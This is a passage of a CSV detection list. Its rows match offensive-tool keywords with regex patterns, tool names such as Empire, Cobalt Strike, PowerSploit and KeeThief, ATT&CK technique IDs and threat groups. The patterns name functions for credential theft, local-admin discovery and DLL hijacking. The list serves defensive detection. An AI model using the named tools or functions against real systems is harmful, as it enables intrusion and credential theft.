Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainAcl*",".{0,1000}Find\-InterestingDomainAcl.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*findinterestingdomainsharefile*",".{0,1000}findinterestingdomainsharefile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-InterestingDomainShareFile*",".{0,1000}Find\-InterestingDomainShareFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*find-interestingfile -*",".{0,1000}find\-interestingfile\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Find-InterestingFile*",".{0,1000}Find\-InterestingFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-KeePassconfig*",".{0,1000}Find\-KeePassconfig.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*Find-LocalAdminAccess *",".{0,1000}Find\-LocalAdminAccess\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*findlocaladminaccess*",".{0,1000}findlocaladminaccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement Enumeration With PowerView","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-LocalAdminAccess*",".{0,1000}Find\-LocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-LocalAdminAccess.ps1*",".{0,1000}Find\-LocalAdminAccess\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Find-LogonScriptCredentials -LogonScripts*",".{0,1000}Find\-LogonScriptCredentials\s\-LogonScripts.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Find-LogonScriptCredentials.ps1*",".{0,1000}Find\-LogonScriptCredentials\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*FindModule *.dll*",".{0,1000}FindModule\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*FindObjects-BOF*",".{0,1000}FindObjects\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","265","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Find-PathDLLHijack*",".{0,1000}Find\-PathDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Find-PotentiallyCrackableAccounts.json*",".{0,1000}Find\-PotentiallyCrackableAccounts\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Find-ProcessDLLHijack*",".{0,1000}Find\-ProcessDLLHijack.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*FindProcessTokenAndDuplicate*",".{0,1000}FindProcessTokenAndDuplicate.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 